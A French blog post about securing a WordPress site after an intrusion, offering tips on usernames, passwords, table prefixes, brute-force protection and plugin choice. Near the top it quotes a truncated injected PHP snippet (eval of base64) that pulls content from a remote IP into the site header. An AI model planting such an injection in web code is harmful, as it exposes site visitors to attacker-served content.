title

Sécuriser WordPress : Comment faire ?

 

Sécuriser WordPress : Comment faire ?

26 Avr 2013, Posted by antoine in

On dit que le pagerank n’apporte rien… Mais depuis que le site est passé pagerank 3, je suis sollicité … Mais pas par des annonceurs, non non, fin de semaine j’ai encore malgré ma sécurité, essuyé une tentative d’intrusion sur mon site, je vais donc vous expliquer comment sécuriser WordPress, pour vous éviter de subir ce viol.

Comment sécuriser WordPress ?

Car en effet, un hack (faiblesse d’un plugin ou de mon thème ?) me donnait un bout de code php sur mon header…

< ?php eval (base64_decode(« DQoNCnByaW50IEBmaWxlX2dldF9jb250
ZW50cygnaHR0cDovLzkzLjExNS44Ni4xNjgvaGxpbmtzL2xpbmtzLnBoc
D91YT0nIC4gQHVybGVuY29kZSgkX? >

J’ai tout de suite contacté Julio Potier de BoiteAweb qui m’annonça que ce code sert à injecter de la pub ou autre code malicieux.

Même si la douleur ne se faisait pas sentir, je me suis rappelé la sensation que j’ai éprouvée lorsqu’on a forcé la porte de cave où je renferme tout mes souvenirs (pas très intéressant apparemment puisqu’ils ne les ont pas volé ^^) et je me suis rappelé comment j’ai sécurisé l’accès juste après.

Car oui, bien souvent on achète une alarme après avoir vu quelqu’un se faire cambrioler, ou quand ça nous arrive à nous…

Alors aujourd’hui je vous incite fortement à m’écouter bande de veinard, car je vous met en garde, et vous donne quelques astuces à mettre en place. Certes vous en trouverez d’autres sur le net, mais chacun sa config.

Astuces pour sécuriser son WordPress

Astuces non puisque je n’invente rien, mais il me fallait un titre accrocheur, je vais donc vous énumérer les points à revoir pour que votre install WordPress soit moins trouée qu’une passoire.

  • Virez moi ce « Admin »

Et bien oui la première chose que va tenter de faire un hacker c’est un brute force (technique qui consiste à  scanner les différents pseudo possible ainsi que les mots de passe jusqu’à ce que ça marche), et si vous donnez déjà au Hacker le pseudo que vous utilisez … Bon dois-je vous dire aussi de ne pas utiliser votre pseudo (celui qui apparait lorsque vous postez un article ou répondez à un com). Pareil, votre mot de passe, blindez le dans le genre :

« jesuis_*_sur=que@tu&nele|trouveras¤pas »

  • Modifiez vos préfixes de tables à l’installation, au lieu de wp_ préférez un truc du genre :

« commenttuvasgalerer_ »

Si votre site est déjà installé, suivez ce tuto d’Aurélien de WP channel. Il est préférable (et merci Julio de m’avoir mis la puce à l’oreille sur le pourquoi de ce changement de table) de modifier les préfixes, car les hacker vont d’abord s’en prendre à vos tables sus nommées, en cherchant à les percer.

  • Suite logique : Évitez le brute force de l’administration

Je vous donne en même temps les plugins qu’il faut se procurer pour éviter les intrusions. Là il s’agit de User Locker qui permet d’éviter les tentatives répétées de connexion à votre administration, car le but d’un brute force, c’est justement de scanner jusqu’à ce que ça fasse clic et que la porte s’ouvre.

  • Ensuite, n’installer pas n’importe quels plugins sur votre site

Favoriser ceux qui ont des mises à jours régulière et faites les ces mises à jour car elles sont importantes, elles résolves peu être des failles de sécurité que les hackers vont exploiter, et choisissez les extensions qui ont un nombre de vote (et de votant) très bon. Un plugin qui n’est pas souvent mis à jour peut contenir des failles de sécurité, si vous désirez une liste de plugins validés pour sécuriser wordpress, vous pouvez contacter notre expert en sécurité WordPress nationnal : Julio Potier.

Justement en parlant de plugin, si vous avez comme moi été victime d’un dépôt de code sur votre site, ou pour éviter d’en faire les frais, voici deux plugins indispensables. Bon tout le monde a compris que j’aime bien Julio, c’est la proximité qui fait ça (Ch’ti représente), mais c’est avant tout pour son travail, et sa rigueur, que je vous conseille :

C’est gratuit mais ça n’empêche pas de faire un don (Julio me paie ma commission en bière)

En détail :

BBQ et CSRF (<= C’est du Ch’ti ça veut dire « Barbecue » et « Comment les Saucisses de Rodrigue sont Fabuleuses ») permettent de bloquer les intrusion de code malicieux, que se soit par voie url ou par voie CRSF (en savoir + ici).

Post Count View lui c’est pour le fun, il s’est incrusté à la fête et vous permet de compter le nombre de vues par article. Vous pouvez même afficher le compteur sur vos articles.